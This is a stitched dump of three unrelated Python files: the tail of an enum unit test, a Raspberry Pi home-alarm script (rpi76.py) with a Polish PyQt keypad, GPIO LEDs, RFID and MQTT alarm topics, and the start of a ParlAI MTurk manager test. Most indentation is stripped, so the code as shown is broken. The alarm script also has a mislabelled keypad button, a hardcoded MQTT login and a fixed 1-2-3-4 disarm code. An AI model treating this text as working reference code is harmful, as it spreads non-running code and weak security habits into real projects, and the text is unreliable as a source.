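# For example, the CONVERT_TEST_NAME_* constants above all equal 5, so the reverse lookup below must resolve to 'CONVERT_TEST_NAME_A'.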
self.assertEqual(test_type(5).name, 'CONVERT_TEST_NAME_A')
def test_convert(self):
test_type = enum.IntEnum._convert(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
# Ensure that test_type has all of the desired names and values.
self.assertEqual(test_type.CONVERT_TEST_NAME_F,
test_type.CONVERT_TEST_NAME_A)
self.assertEqual(test_type.CONVERT_TEST_NAME_B, 5)
self.assertEqual(test_type.CONVERT_TEST_NAME_C, 5)
self.assertEqual(test_type.CONVERT_TEST_NAME_D, 5)
self.assertEqual(test_type.CONVERT_TEST_NAME_E, 5)
# Ensure that test_type only picked up names matching the filter.
self.assertEqual([name for name in dir(test_type)
if name[0:2] not in ('CO', '__')],
[], msg='Names other than CONVERT_TEST_* found.')
if __name__ == '__main__':
unittest.main()
|
rpi76.py
|
# importing libraries
import paho.mqtt.client as mqtt
from PyQt5.QtWidgets import *
from PyQt5 import QtCore, QtGui
from PyQt5.QtGui import *
from PyQt5.QtCore import *
import sys
import time
import threading
import RPi.GPIO as GPIO
try:
GPIO.setmode(GPIO.BCM)
GPIO.setup(23, GPIO.IN) # RFID
GPIO.setup(24, GPIO.OUT)
GPIO.setup(25, GPIO.OUT)
GPIO.setup(8, GPIO.OUT)
GPIO.setup(7, GPIO.OUT)
GPIO.setup(1, GPIO.OUT)
GPIO.output(24, GPIO.LOW)  # RED
GPIO.output(25, GPIO.LOW) # YELLOW UPPER
GPIO.output(8, GPIO.LOW) # YELLOW MIDDLE
GPIO.output(7, GPIO.LOW) # YELLOW BOTTOM
GPIO.output(1, GPIO.LOW) # GREEN
RFID_flag = 0
Alarm = 0
armed = 0
password = [1, 2, 3, 4]
code = []
txt = ''
MoveAlarm = 0
WaterAlarm = 0
FireAlarm = 0
FridgeAlarm = 0
problem = 0
# Flag that decides whether status messages are published over MQTT
MQTT_publish = True
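# MQTT callback: remote sensor nodes publish to the BHL/* alarm topics; set the matching flag here for the main AThread loop to act on.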
def on_message(client, userdata, message):
global MoveAlarm, WaterAlarm, FireAlarm
if message.topic == "BHL/MoveDetected/Alarm":
MoveAlarm = 1
if message.topic == "BHL/FireAlarm/Alarm":
FireAlarm = 1
if message.topic == "BHL/WaterAlarm/Alarm":
WaterAlarm = 1
broker_address = "192.168.1.200"
client = mqtt.Client("Control_Interface")
client.username_pw_set("Raspberry_Pi", "Rpi_Raspberry_Python")
client.on_message = on_message
client.connect(broker_address, 1883)
client.loop_start()
client.subscribe([("BHL/MoveAlarm/Alarm", 1), ("BHL/FireAlarm/Alarm", 1), ("BHL/WaterAlarm/Alarm", 1),
("BHL/MoveDetected/Alarm", 1)])
def RFID_callback(channel):
global RFID_flag
RFID_flag = 1
GPIO.add_event_detect(23, GPIO.FALLING, callback=RFID_callback, bouncetime=200)
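# Hardware interrupt: a falling edge on GPIO 23 (RFID reader output) sets RFID_flag; bouncetime=200 ms filters contact bounce.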
class AThread(QThread):
def run(self):
global armed, MoveAlarm, WaterAlarm, FireAlarm, Alarm, problem, RFID_flag
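# Main polling loop: react to the flags set by the MQTT and RFID callbacks, drive the LEDs and the status label accordingly.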
while True:
if RFID_flag == 1:
RFID_flag = 0
if armed == 1:
window.rfid()
elif armed == 0:
arm_alarm()
if armed == 1 and MoveAlarm == 1 and Alarm == 0:
window.label.setStyleSheet("color: rgb(0, 0, 0);")
problem = 1
for t in range(5, -1, -1):
if RFID_flag == 1 or armed == 0:
problem = 0
break
if t == 0:
window.label.setStyleSheet("color: rgb(255, 0, 0);")
window.label.setText('ALARM')
Alarm = 1
problem = 0
GPIO.output(24, GPIO.HIGH)  # RED
GPIO.output(25, GPIO.HIGH) # YELLOW UPPER
GPIO.output(8, GPIO.HIGH) # YELLOW MIDDLE
GPIO.output(7, GPIO.HIGH) # YELLOW BOTTOM
GPIO.output(1, GPIO.HIGH) # GREEN
if MQTT_publish:
client.publish("BHL/MoveAlarm/Alarm", "1")
break
if txt == '':
window.label.setText('Aktywacja alarmu za {}s'.format(t))
time.sleep(1)
if WaterAlarm == 1:
GPIO.output(24, GPIO.LOW)  # RED
GPIO.output(25, GPIO.LOW) # YELLOW UPPER
GPIO.output(8, GPIO.LOW) # YELLOW MIDDLE
GPIO.output(7, GPIO.LOW) # YELLOW BOTTOM
GPIO.output(1, GPIO.LOW) # GREEN
armed = 1
while WaterAlarm:
if len(code) == 0:
GPIO.output(1, GPIO.LOW)
window.label.setStyleSheet("color: rgb(0, 0, 255);")
window.label.setText('UWAGA ZALANIE!')
time.sleep(1)
GPIO.output(7, GPIO.HIGH) # YELLOW BOTTOM
time.sleep(1)
GPIO.output(7, GPIO.LOW) # YELLOW BOTTOM
if armed == 0:
window.label.setStyleSheet("color: rgb(0, 255, 0);")
window.label.setText('Alarm rozbrojony')
GPIO.output(24, GPIO.LOW)  # RED
GPIO.output(25, GPIO.LOW) # YELLOW UPPER
GPIO.output(8, GPIO.LOW) # YELLOW MIDDLE
GPIO.output(7, GPIO.LOW) # YELLOW BOTTOM
GPIO.output(1, GPIO.HIGH) # GREEN
if RFID_flag == 1:
WaterAlarm = 0
if FireAlarm == 1:
GPIO.output(24, GPIO.LOW)  # RED
GPIO.output(25, GPIO.LOW) # YELLOW UPPER
GPIO.output(8, GPIO.LOW) # YELLOW MIDDLE
GPIO.output(7, GPIO.LOW) # YELLOW BOTTOM
GPIO.output(1, GPIO.LOW) # GREEN
armed = 1
while FireAlarm == 1:
if len(code) == 0:
GPIO.output(1, GPIO.LOW) # GREEN
window.label.setStyleSheet("color: rgb(255, 0, 0);")
window.label.setText('UWAGA POZAR!')
time.sleep(1)
GPIO.output(8, GPIO.HIGH) # YELLOW MIDDLE
time.sleep(1)
GPIO.output(8, GPIO.LOW) # YELLOW MIDDLE
if armed == 0:
window.label.setStyleSheet("color: rgb(0, 255, 0);")
window.label.setText('Alarm rozbrojony')
GPIO.output(24, GPIO.LOW)  # RED
GPIO.output(25, GPIO.LOW) # YELLOW UPPER
GPIO.output(8, GPIO.LOW) # YELLOW MIDDLE
GPIO.output(7, GPIO.LOW) # YELLOW BOTTOM
GPIO.output(1, GPIO.HIGH) # GREEN
if RFID_flag == 1:
FireAlarm = 0
def clear_flags():
global MoveAlarm, WaterAlarm, FireAlarm, Alarm, RFID_flag, problem
problem = 0
Alarm = 0
MoveAlarm = 0
WaterAlarm = 0
FireAlarm = 0
RFID_flag = 0
GPIO.output(24, GPIO.LOW)  # RED
GPIO.output(25, GPIO.LOW) # YELLOW UPPER
GPIO.output(8, GPIO.LOW) # YELLOW MIDDLE
GPIO.output(7, GPIO.LOW) # YELLOW BOTTOM
GPIO.output(1, GPIO.LOW) # GREEN
if MQTT_publish:
client.publish("BHL/StopAlarm", "1")
def arm_alarm():
global code, txt, armed, RFID_flag
window.label.setStyleSheet("color: rgb(255, 0, 0);")
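# Arming countdown: flash the upper yellow LED while counting down; presenting the RFID tag (RFID_flag) aborts arming.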
for t in range(6, -2, -2):
if RFID_flag == 1:
window.label.setStyleSheet("color: rgb(0, 255, 0);")
window.label.setText('Przerwano uzbrajanie alarmu')
time.sleep(2)
break
if t < 20:
window.label.setText('Uzbrajanie alarmu {}s'.format(t + 1))
GPIO.output(25, GPIO.HIGH)
time.sleep(1)
window.label.setText('Uzbrajanie alarmu {}s'.format(t))
GPIO.output(25, GPIO.LOW)
time.sleep(1)
clear_flags()
GPIO.output(25, GPIO.LOW)
if RFID_flag == 1:
RFID_flag = 0
armed = 0
clean_label()
else:
window.label.setText('Alarm uzbrojony')
GPIO.output(24, GPIO.HIGH)
GPIO.output(25, GPIO.LOW)
GPIO.output(8, GPIO.LOW)
GPIO.output(7, GPIO.LOW)
GPIO.output(1, GPIO.LOW)
armed = 1
def clean_delay():
global txt, code
if problem == 0 and Alarm == 1:
time.sleep(1)
window.label.setStyleSheet("color: rgb(255, 0, 0);")
window.label.setText('ALARM')
GPIO.output(24, GPIO.HIGH)  # RED
GPIO.output(25, GPIO.HIGH) # YELLOW UPPER
GPIO.output(8, GPIO.HIGH) # YELLOW MIDDLE
GPIO.output(7, GPIO.HIGH) # YELLOW BOTTOM
GPIO.output(1, GPIO.HIGH) # GREEN
code = []
txt = ''
else:
GPIO.output(25, GPIO.LOW) # YELLOW UPPER
GPIO.output(8, GPIO.LOW) # YELLOW MIDDLE
GPIO.output(7, GPIO.HIGH) # YELLOW BOTTOM
GPIO.output(1, GPIO.LOW) # GREEN
time.sleep(0.5)
code = []
txt = ''
GPIO.output(25, GPIO.LOW) # YELLOW UPPER
GPIO.output(8, GPIO.HIGH) # YELLOW MIDDLE
GPIO.output(7, GPIO.LOW) # YELLOW BOTTOM
time.sleep(0.5)
GPIO.output(25, GPIO.HIGH) # YELLOW UPPER
GPIO.output(8, GPIO.LOW) # YELLOW MIDDLE
GPIO.output(7, GPIO.LOW) # YELLOW BOTTOM
time.sleep(0.5)
GPIO.output(25, GPIO.LOW) # YELLOW UPPER
clean_label()
def clean_label():
global armed, Alarm, FireAlarm, WaterAlarm
if armed == 1 and FireAlarm == 0 and WaterAlarm == 0 and problem == 0:
window.label.setStyleSheet("color: rgb(255, 0, 0);")
window.label.setText('Alarm uzbrojony')
GPIO.output(24, GPIO.HIGH)
GPIO.output(25, GPIO.LOW) # YELLOW UPPER
GPIO.output(8, GPIO.LOW) # YELLOW MIDDLE
GPIO.output(7, GPIO.LOW) # YELLOW BOTTOM
GPIO.output(1, GPIO.LOW) # GREEN
elif armed == 1 and Alarm == 1:
window.label.setStyleSheet("color: rgb(255, 0, 0);")
window.label.setText('ALARM')
GPIO.output(24, GPIO.HIGH)  # RED
GPIO.output(25, GPIO.HIGH) # YELLOW UPPER
GPIO.output(8, GPIO.HIGH) # YELLOW MIDDLE
GPIO.output(7, GPIO.HIGH) # YELLOW BOTTOM
GPIO.output(1, GPIO.HIGH) # GREEN
elif armed == 0:
window.label.setStyleSheet("color: rgb(0, 255, 0);")
Alarm = 0
window.label.setStyleSheet("color: rgb(0, 255, 0);")
window.label.setText('Alarm rozbrojony')
clear_flags()
GPIO.output(24, GPIO.LOW)  # RED
GPIO.output(25, GPIO.LOW) # YELLOW UPPER
GPIO.output(8, GPIO.LOW) # YELLOW MIDDLE
GPIO.output(7, GPIO.LOW) # YELLOW BOTTOM
GPIO.output(1, GPIO.HIGH) # GREEN
def incorrect_code():
global code, txt, armed
window.label.setText('Kod niepoprawny')
t1 = threading.Thread(target=clean_delay)
t1.start()
def correct_code():
global code, txt, armed
if armed == 1:
code = []
txt = ''
armed = 0
t1 = threading.Thread(target=clean_label)
t1.start()
elif armed == 0:
code = []
txt = ''
t1 = threading.Thread(target=arm_alarm)
t1.start()
class Window(QMainWindow):
def __init__(self):
super().__init__()
self.setWindowTitle("System alarmowy")
self.setGeometry(100, 100, 620, 450)
self.UiComponents()
self.show()
# method for widgets
def UiComponents(self):
self.label = QLabel(self)
self.label.setGeometry(5, 5, 790, 80)
self.label.setWordWrap(True)
self.label.setStyleSheet("border : 2px solid black")
self.label.setAlignment(Qt.AlignCenter)
self.label.setFont(QFont('Arial', 25))
push1 = QPushButton("1", self)
push1.setGeometry(230, 97, 110, 110)
push2 = QPushButton("2", self)
push2.setGeometry(345, 97, 110, 110)
push3 = QPushButton("3", self)
push3.setGeometry(460, 97, 110, 110)
push4 = QPushButton("4", self)
push4.setGeometry(230, 212, 110, 110)
push5 = QPushButton("5", self)
push5.setGeometry(345, 212, 110, 110)
push6 = QPushButton("5", self)
push6.setGeometry(460, 212, 110, 110)
push7 = QPushButton("7", self)
push7.setGeometry(230, 327, 110, 110)
push8 = QPushButton("8", self)
push8.setGeometry(345, 327, 110, 110)
push9 = QPushButton("9", self)
push9.setGeometry(460, 327, 110, 110)
# Route every keypad button through one shared handler, passing its digit.
buttons = (push1, push2, push3, push4, push5, push6, push7, push8, push9)
for digit, button in enumerate(buttons, start=1):
    button.clicked.connect(lambda _checked=False, d=digit: self.digit_pressed(d))
self.showMaximized()
def rfid(self):
global code, txt, armed, Alarm
Alarm = 0
armed = 0
code = []
txt = ''
clean_label()
def digit_pressed(self, digit):
    # Shared keypad handler: append the digit, mask the display with '*',
    # and check the 4-digit entry against the stored password.
    global code, txt
    code.append(digit)
    self.label.setStyleSheet("color: rgb(0, 0, 0);")
    txt = txt + '*'
    if len(code) == 4:
        if code == password:
            correct_code()
        else:
            incorrect_code()
    else:
        self.label.setText(txt)
App = QApplication(sys.argv)
window = Window()
window.label.setStyleSheet("color: rgb(0, 255, 0);")
window.label.setText('Alarm rozbrojony')
clear_flags()
GPIO.output(1, GPIO.HIGH) # GREEN
thread = AThread()
thread.finished.connect(App.exit)
thread.start()
sys.exit(App.exec())
# client.loop_stop() #stop the loop
except (KeyboardInterrupt, SystemExit):
    print("Clean Program Exit")
finally:
GPIO.cleanup() # this ensures a clean exit
|
test_mturk_manager.py
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import unittest
import os
import time
import json
import threading
import pickle
from unittest import mock
from parlai.mturk.core.worker_manager import WorkerManager
from parlai.mturk.core.agents import MTurkAgent
from parlai.mturk.core.shared_utils import AssignState
from parlai.mturk.core.mturk_manager import MTurkManager
from parlai.mturk.core.socket_manager import SocketManager, Packet
from parlai.core.params import ParlaiParser
from websocket_server import WebsocketServer
import parlai.mturk.core.mturk_manager as MTurkManagerFile
import parlai.mturk.core.data_model as data_model
import parlai.utils.testing as testing_utils
parent_dir = os.path.dirname(os.path.abspath(__file__))
MTurkManagerFile.parent_dir = os.path.dirname(os.path.abspath(__file__))
MTurkManagerFile.mturk_utils = mock.MagicMock()
# Let's ignore the logging part
MTurkManagerFile.shared_utils.print_and_log = mock.MagicMock()
TEST_WORKER_ID_1 = 'TEST_WORKER_ID_1'
TEST_WORKER_ID_2 = 'TEST_WORKER_ID_2'
TEST_WORKER_ID_3 = 'TEST_WORKER_ID_3'
TEST_ASSIGNMENT_ID_1 = 'TEST_ASSIGNMENT_ID_1'
TEST_ASSIGNMENT_ID_2 = 'TEST_ASSIGNMENT_ID_2'
TEST_ASSIGNMENT_ID_3 = 'TEST_ASSIGNMENT_ID_3'
TEST_HIT_ID_1 = 'TEST_HIT_ID_1'
TEST_HIT_ID_2 = 'TEST_HIT_ID_2'
TEST_HIT_ID_3 = 'TEST_HIT_ID_3'
FAKE_ID = 'BOGUS'
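# Test helper: poll val_func() every 100ms and fail the assertion if it has
# not returned `val` within max_time seconds.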
def assert_equal_by(val_func, val, max_time):
start_time = time.time()
while val_func() != val:
assert (
time.time() - start_time < max_time
), "Value was not attained in specified time"
time.sleep(0.1)
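# Lightweight stand-in for the routing server: runs a local websocket server
# that acks WORLD_ALIVE packets, answers heartbeats with pongs and dispatches
# other packets to per-receiver handlers registered in self.handlers.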
class MockSocket:
def __init__(self):
self.last_messages = {}
self.connected = False
self.disconnected = False
self.closed = False
self.ws = None
self.should_heartbeat = True
self.fake_workers = []
self.port = None
self.launch_socket()
self.handlers = {}
while self.ws is None:
time.sleep(0.05)
time.sleep(1)
def send(self, packet):
self.ws.send_message_to_all(packet)
def close(self):
if not self.closed:
self.ws.server_close()
self.ws.shutdown()
self.closed = True
def do_nothing(self, *args):
pass
def launch_socket(self):
def on_message(client, server, message):
if self.closed:
raise Exception('Socket is already closed...')
if message == '':
return
packet_dict = json.loads(message)
if packet_dict['content']['id'] == 'WORLD_ALIVE':
self.ws.send_message(client, json.dumps({'type': 'conn_success'}))
self.connected = True
elif packet_dict['content']['type'] == 'heartbeat':
pong = packet_dict['content'].copy()
pong['type'] = 'pong'
self.ws.send_message(
client,
json.dumps(
{'type': data_model.SOCKET_ROUTE_PACKET_STRING, 'content': pong}
),
)
if 'receiver_id' in packet_dict['content']:
receiver_id = packet_dict['content']['receiver_id']
use_func = self.handlers.get(receiver_id, self.do_nothing)
use_func(packet_dict['content'])
def on_connect(client, server):
pass
def on_disconnect(client, server):
self.disconnected = True
def run_socket(*args):
port = 3030
while self.port is None:
try:
self.ws = WebsocketServer(port, host='127.0.0.1')
self.port = port
except OSError:
port += 1
self.ws.set_fn_client_left(on_disconnect)
self.ws.set_fn_new_client(on_connect)
self.ws.set_fn_message_received(on_message)
self.ws.run_forever()
self.listen_thread = threading.Thread(
target=run_socket, name='Fake-Socket-Thread'
)
self.listen_thread.daemon = True
self.listen_thread.start()
class InitTestMTurkManager(unittest.TestCase):
"""
Unit tests for MTurkManager setup.
"""
def setUp(self):
argparser = ParlaiParser(False, False)
argparser.add_parlai_data_path()
argparser.add_mturk_args()
self.opt = argparser.parse_args([], print_args=False)
self.opt['task'] = 'unittest'
self.opt['assignment_duration_in_seconds'] = 6
self.mturk_agent_ids = ['mturk_agent_1', 'mturk_agent_2']
self.mturk_manager = MTurkManager(
opt=self.opt, mturk_agent_ids=self.mturk_agent_ids, is_test=True
)
def tearDown(self):
self.mturk_manager.shutdown()
def test_init(self):
manager = self.mturk_manager
opt = self.opt
self.assertIsNone(manager.server_url)
self.assertIsNone(manager.topic_arn)
self.assertIsNone(manager.server_task_name)
self.assertIsNone(manager.task_group_id)
self.assertIsNone(manager.run_id)
self.assertIsNone(manager.task_files_to_copy)
self.assertIsNone(manager.onboard_function)
self.assertIsNone(manager.socket_manager)
self.assertFalse(manager.is_shutdown)
self.assertFalse(manager.is_unique)
self.assertEqual(manager.opt, opt)
self.assertEqual(manager.mturk_agent_ids, self.mturk_agent_ids)
self.assertEqual(manager.is_sandbox, opt['is_sandbox'])
self.assertEqual(manager.num_conversations, opt['num_conversations'])
self.assertEqual(manager.is_sandbox, opt['is_sandbox'])
self.assertGreaterEqual(
manager.required_hits, manager.num_conversations * len(self.mturk_agent_ids)
)
self.assertIsNotNone(manager.agent_pool_change_condition)
self.assertEqual(manager.minimum_messages, opt.get('min_messages', 0))
self.assertEqual(
manager.auto_approve_delay, opt.get('auto_approve_delay', 5 * 24 * 3600)
)
self.assertEqual(manager.has_time_limit, opt.get('max_time', 0) > 0)
self.assertIsInstance(manager.worker_manager, WorkerManager)
self.assertEqual(manager.task_state, manager.STATE_CREATED)
def test_init_state(self):
manager = self.mturk_manager
manager._init_state()
self.assertEqual(manager.agent_pool, [])
self.assertEqual(manager.hit_id_list, [])
self.assertEqual(manager.conversation_index, 0)
self.assertEqual(manager.started_conversations, 0)
self.assertEqual(manager.completed_conversations, 0)
self.assertEqual(manager.task_threads, [])
self.assertTrue(manager.accepting_workers, True)
self.assertIsNone(manager.qualifications)
self.assertGreater(manager.time_limit_checked, time.time() - 1)
self.assertEqual(manager.task_state, manager.STATE_INIT_RUN)
class TestMTurkManagerUnitFunctions(unittest.TestCase):
"""
Tests some of the simpler MTurkManager functions that don't require much additional
state to run.
"""
def setUp(self):
self.fake_socket = MockSocket()
time.sleep(0.1)
argparser = ParlaiParser(False, False)
argparser.add_parlai_data_path()
argparser.add_mturk_args()
self.opt = argparser.parse_args([], print_args=False)
self.opt['task'] = 'unittest'
self.opt['assignment_duration_in_seconds'] = 6
self.mturk_agent_ids = ['mturk_agent_1', 'mturk_agent_2']
self.mturk_manager = MTurkManager(
opt=self.opt, mturk_agent_ids=self.mturk_agent_ids, is_test=True
)
self.mturk_manager._init_state()
self.mturk_manager.port = self.fake_socket.port
self.agent_1 = MTurkAgent(
self.opt,
self.mturk_manager,
TEST_HIT_ID_1,
TEST_ASSIGNMENT_ID_1,
TEST_WORKER_ID_1,
)
self.agent_2 = MTurkAgent(
self.opt,
self.mturk_manager,
TEST_HIT_ID_2,
TEST_ASSIGNMENT_ID_2,
TEST_WORKER_ID_2,
)
self.agent_3 = MTurkAgent(
self.opt,
self.mturk_manager,
TEST_HIT_ID_3,
TEST_ASSIGNMENT_ID_3,
TEST_WORKER_ID_3,
)
def tearDown(self):
self.mturk_manager.shutdown()
self.fake_socket.close()
def test_move_to_waiting(self):
manager = self.mturk_manager
manager.worker_manager.change_agent_conversation = mock.MagicMock()
manager.socket_manager = mock.MagicMock()
manager.socket_manager.close_channel = mock.MagicMock()
manager.force_expire_hit = mock.MagicMock()
self.agent_1.set_status(AssignState.STATUS_DISCONNECT)
self.agent_1.reduce_state = mock.MagicMock()
self.agent_2.reduce_state = mock.MagicMock()
self.agent_3.reduce_state = mock.MagicMock()
# Test with a disconnected agent, assert the channel is closed
manager._move_agents_to_waiting([self.agent_1])
self.agent_1.reduce_state.assert_called_once()
manager.socket_manager.close_channel.assert_called_once_with(
self.agent_1.get_connection_id()
)
manager.worker_manager.change_agent_conversation.assert_not_called()
manager.force_expire_hit.assert_not_called()
manager.socket_manager.close_channel.reset_mock()
# Test with a connected agent, should be moved to waiting
manager._move_agents_to_waiting([self.agent_2])
self.agent_2.reduce_state.assert_not_called()
manager.socket_manager.close_channel.assert_not_called()
manager.worker_manager.change_agent_conversation.assert_called_once()
args = manager.worker_manager.change_agent_conversation.call_args[1]
self.assertEqual(args['agent'], self.agent_2)
self.assertTrue(manager.is_waiting_world(args['conversation_id']))
self.assertEqual(args['new_agent_id'], 'waiting')
manager.force_expire_hit.assert_not_called()
manager.worker_manager.change_agent_conversation.reset_mock()
# Test when no longer accepting agents
manager.accepting_workers = False
manager._move_agents_to_waiting([self.agent_3])
self.agent_3.reduce_state.assert_not_called()
manager.socket_manager.close_channel.assert_not_called()
manager.worker_manager.change_agent_conversation.assert_not_called()
manager.force_expire_hit.assert_called_once_with(
self.agent_3.worker_id, self.agent_3.assignment_id
)
def test_socket_setup(self):
"""
Basic socket setup should fail when not in correct state, but succeed otherwise.
"""
self.mturk_manager.task_state = self.mturk_manager.STATE_CREATED
with self.assertRaises(AssertionError):
self.mturk_manager._setup_socket()
self.mturk_manager.task_group_id = 'TEST_GROUP_ID'
self.mturk_manager.server_url = 'https://127.0.0.1'
self.mturk_manager.task_state = self.mturk_manager.STATE_INIT_RUN
self.mturk_manager._setup_socket()
self.assertIsInstance(self.mturk_manager.socket_manager, SocketManager)
def test_worker_alive(self):
# Setup for test
manager = self.mturk_manager
manager.task_group_id = 'TEST_GROUP_ID'
manager.server_url = 'https://127.0.0.1'
manager.task_state = manager.STATE_ACCEPTING_WORKERS
manager._setup_socket()
manager.force_expire_hit = mock.MagicMock()
manager._onboard_new_agent = mock.MagicMock()
manager.socket_manager.open_channel = mock.MagicMock(
wraps=manager.socket_manager.open_channel
)
manager.worker_manager.worker_alive = mock.MagicMock(
wraps=manager.worker_manager.worker_alive
)
open_channel = manager.socket_manager.open_channel
worker_alive = manager.worker_manager.worker_alive
# Test no assignment
alive_packet = Packet(
'',
'',
'',
'',
'',
{
'worker_id': TEST_WORKER_ID_1,
'hit_id': TEST_HIT_ID_1,
'assignment_id': None,
'conversation_id': None,
},
'',
)
manager._on_alive(alive_packet)
open_channel.assert_not_called()
worker_alive.assert_not_called()
manager._onboard_new_agent.assert_not_called()
# Test not accepting workers
alive_packet = Packet(
'',
'',
'',
'',
'',
{
'worker_id': TEST_WORKER_ID_1,
'hit_id': TEST_HIT_ID_1,
'assignment_id': TEST_ASSIGNMENT_ID_1,
'conversation_id': None,
},
'',
)
manager.accepting_workers = False
manager._on_alive(alive_packet)
open_channel.assert_called_once_with(TEST_WORKER_ID_1, TEST_ASSIGNMENT_ID_1)
worker_alive.assert_called_once_with(TEST_WORKER_ID_1)
worker_state = manager.worker_manager._get_worker(TEST_WORKER_ID_1)
self.assertIsNotNone(worker_state)
open_channel.reset_mock()
worker_alive.reset_mock()
manager.force_expire_hit.assert_called_once_with(
TEST_WORKER_ID_1, TEST_ASSIGNMENT_ID_1
)
manager._onboard_new_agent.assert_not_called()
manager.force_expire_hit.reset_mock()
# Test successful creation
manager.accepting_workers = True
manager._on_alive(alive_packet)
open_channel.assert_called_once_with(TEST_WORKER_ID_1, TEST_ASSIGNMENT_ID_1)
worker_alive.assert_called_once_with(TEST_WORKER_ID_1)
manager._onboard_new_agent.assert_called_once()
manager._onboard_new_agent.reset_mock()
manager.force_expire_hit.assert_not_called()
agent = manager.worker_manager.get_agent_for_assignment(TEST_ASSIGNMENT_ID_1)
self.assertIsInstance(agent, MTurkAgent)
self.assertEqual(agent.get_status(), AssignState.STATUS_NONE)
# Reconnect in various conditions
agent.set_status = mock.MagicMock(wraps=agent.set_status)
manager._add_agent_to_pool = mock.MagicMock()
# Reconnect when none state no connection_id
agent.log_reconnect = mock.MagicMock(wraps=agent.log_reconnect)
manager._on_alive(alive_packet)
manager.force_expire_hit.assert_called_once_with(
TEST_WORKER_ID_1, TEST_ASSIGNMENT_ID_1
)
manager.force_expire_hit.reset_mock()
agent.set_status.assert_not_called()
manager._add_agent_to_pool.assert_not_called()
agent.log_reconnect.assert_called_once()
agent.log_reconnect.reset_mock()
# Reconnect in None state onboarding conversation_id
alive_packet = Packet(
'',
'',
'',
'',
'',
{
'worker_id': TEST_WORKER_ID_1,
'hit_id': TEST_HIT_ID_1,
'assignment_id': TEST_ASSIGNMENT_ID_1,
'conversation_id': 'o_1234',
},
'',
)
manager._on_alive(alive_packet)
manager.force_expire_hit.assert_not_called()
agent.set_status.assert_called_once_with(AssignState.STATUS_ONBOARDING)
manager._add_agent_to_pool.assert_not_called()
agent.log_reconnect.assert_called_once()
agent.log_reconnect.reset_mock()
# Reconnect in None state waiting conversation_id
alive_packet = Packet(
'',
'',
'',
'',
'',
{
'worker_id': TEST_WORKER_ID_1,
'hit_id': TEST_HIT_ID_1,
'assignment_id': TEST_ASSIGNMENT_ID_1,
'conversation_id': 'w_1234',
},
'',
)
agent.set_status(AssignState.STATUS_NONE)
agent.set_status.reset_mock()
manager._on_alive(alive_packet)
manager.force_expire_hit.assert_not_called()
agent.set_status.assert_called_once_with(AssignState.STATUS_WAITING)
manager._add_agent_to_pool.assert_called_once_with(agent)
manager._add_agent_to_pool.reset_mock()
agent.log_reconnect.assert_called_once()
agent.log_reconnect.reset_mock()
# Reconnect in onboarding with waiting conversation id
agent.set_status(AssignState.STATUS_ONBOARDING)
agent.set_status.reset_mock()
manager._on_alive(alive_packet)
manager.force_expire_hit.assert_not_called()
agent.set_status.assert_called_once_with(AssignState.STATUS_WAITING)
manager._add_agent_to_pool.assert_called_once_with(agent)
manager._add_agent_to_pool.reset_mock()
agent.log_reconnect.assert_called_once()
agent.log_reconnect.reset_mock()
# Reconnect in onboarding with no conversation id
alive_packet = Packet(
'',
'',
'',
'',
'',
{
'worker_id': TEST_WORKER_ID_1,
'hit_id': TEST_HIT_ID_1,
'assignment_id': TEST_ASSIGNMENT_ID_1,
'conversation_id': None,
},
'',
)
agent.set_status(AssignState.STATUS_ONBOARDING)
agent.set_status.reset_mock()
manager._restore_agent_state = mock.MagicMock()
manager._on_alive(alive_packet)
manager.force_expire_hit.assert_not_called()
manager._restore_agent_state.assert_called_once_with(
TEST_WORKER_ID_1, TEST_ASSIGNMENT_ID_1
)
agent.set_status.assert_not_called()
manager._add_agent_to_pool.assert_not_called()
agent.log_reconnect.assert_called_once()
agent.log_reconnect.reset_mock()
# Reconnect in onboarding but not accepting new workers
manager.accepting_workers = False
agent.set_status(AssignState.STATUS_ONBOARDING)
agent.set_status.reset_mock()
manager._restore_agent_state = mock.MagicMock()
manager._on_alive(alive_packet)
manager.force_expire_hit.assert_called_once_with(
TEST_WORKER_ID_1, TEST_ASSIGNMENT_ID_1
)
manager.force_expire_hit.reset_mock()
manager._restore_agent_state.assert_not_called()
agent.set_status.assert_not_called()
manager._add_agent_to_pool.assert_not_called()
agent.log_reconnect.assert_called_once()
agent.log_reconnect.reset_mock()
# Reconnect in waiting no conv id
manager.accepting_workers = True
agent.set_status(AssignState.STATUS_WAITING)
agent.set_status.reset_mock()
manager._restore_agent_state = mock.MagicMock()
manager._on_alive(alive_packet)
manager.force_expire_hit.assert_not_called()
manager._restore_agent_state.assert_called_once_with(
TEST_WORKER_ID_1, TEST_ASSIGNMENT_ID_1
)
agent.set_status.assert_not_called()
manager._add_agent_to_pool.assert_called_once()
manager._add_agent_to_pool.reset_mock()
agent.log_reconnect.assert_called_once()
agent.log_reconnect.reset_mock()
# Reconnect in waiting with conv id
alive_packet = Packet(
'',
'',
'',
'',
'',
{
'worker_id': TEST_WORKER_ID_1,
'hit_id': TEST_HIT_ID_1,
'assignment_id': TEST_ASSIGNMENT_ID_1,
'conversation_id': 'w_1234',
},
'',
)
agent.set_status(AssignState.STATUS_WAITING)
agent.set_status.reset_mock()
manager._restore_agent_state = mock.MagicMock()
manager._on_alive(alive_packet)
manager.force_expire_hit.assert_not_called()
manager._restore_agent_state.assert_not_called()
agent.set_status.assert_not_called()
manager._add_agent_to_pool.assert_called_once()
manager._add_agent_to_pool.reset_mock()
agent.log_reconnect.assert_called_once()
agent.log_reconnect.reset_mock()
# Reconnect in waiting with task id
alive_packet = Packet(
'',
'',
'',
'',
'',
{
'worker_id': TEST_WORKER_ID_1,
'hit_id': TEST_HIT_ID_1,
'assignment_id': TEST_ASSIGNMENT_ID_1,
'conversation_id': 't_1234',
},
'',
)
agent.set_status(AssignState.STATUS_WAITING)
agent.set_status.reset_mock()
manager._restore_agent_state = mock.MagicMock()
manager._on_alive(alive_packet)
manager.force_expire_hit.assert_not_called()
manager._restore_agent_state.assert_not_called()
agent.set_status.assert_called_with(AssignState.STATUS_IN_TASK)
manager._add_agent_to_pool.assert_not_called()
agent.log_reconnect.assert_called_once()
agent.log_reconnect.reset_mock()
# Test active convos failure
agent.set_status(AssignState.STATUS_IN_TASK)
agent.set_status.reset_mock()
alive_packet = Packet(
'',
'',
'',
'',
'',
{
'worker_id': TEST_WORKER_ID_1,
'hit_id': TEST_HIT_ID_1,
'assignment_id': TEST_ASSIGNMENT_ID_2,
'conversation_id': None,
},
'',
